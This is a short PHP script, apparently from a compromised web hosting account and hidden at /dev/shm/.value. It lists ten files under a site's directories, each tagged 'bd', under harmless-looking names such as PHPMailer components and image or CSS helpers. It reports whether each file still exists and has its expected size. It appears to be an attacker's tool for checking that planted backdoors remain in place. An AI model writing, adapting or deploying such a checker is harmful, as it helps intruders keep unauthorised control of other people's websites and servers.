File: //dev/shm/.value
<?php $r = '/home/bvkaynrz/cinemadeck.click'; $x = ["/backup/public/vendor/phpmailer/phpmailer/language/phpmailer.lang.pt.php"=>"bd@@1012482@@951",
"/backup/public/play/admin.trash.php"=>"bd@@1024540@@901",
"/include/images/data_extensions.php"=>"bd@@1024584@@863",
"/include/js/crop.php"=>"bd@@1024586@@865",
"/include/css/help_0.php"=>"bd@@1024589@@996",
"/templates/v1/update_to_FINAL.php"=>"bd@@1024591@@838",
"/backup/public/vendor/phpmailer/phpmailer/get.oauth.token.php"=>"bd@@1012870@@1002",
"/backup/public/vendor/profiles.php"=>"bd@@1015974@@857",
"/backup/public/iframe/sendactivation.php"=>"bd@@1015976@@960",
"/backup/public/vendor/phpmailer/phpmailer/src/read.php"=>"bd@@1012209@@819"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');